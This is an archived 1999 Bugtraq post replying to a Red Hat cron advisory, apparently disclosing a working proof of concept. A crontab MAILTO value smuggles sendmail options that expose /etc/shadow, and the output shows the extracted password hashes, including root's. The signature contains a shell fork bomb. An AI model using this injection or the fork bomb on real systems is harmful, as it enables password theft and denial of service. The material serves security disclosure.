[11554] in bugtraq
Re: [RHSA-1999:030-01] Buffer overflow in cron daemon
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Sat Aug 28 12:47:00 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <lcamtuf.4.05.9907050313390.622-100000@nimue.ids.pl>
Date: Mon, 5 Jul 1999 03:27:32 +0200
Reply-To: Michal Zalewski <lcamtuf@IDS.PL>
From: Michal Zalewski <lcamtuf@IDS.PL>
X-To: Bill Nottingham <notting@REDHAT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990825211720.A3016@xenomorph.redhat.com>
On Wed, 25 Aug 1999, Bill Nottingham wrote:
> To the best of our knowledge, no known exploits exist at this time.
>
> Also, it was possible to use specially formatted 'MAILTO' environment
> variables to send commands to sendmail.
Oh, something from scratch:
[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
[lcamtuf@onehost lcamtuf]$ sleep 60
[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
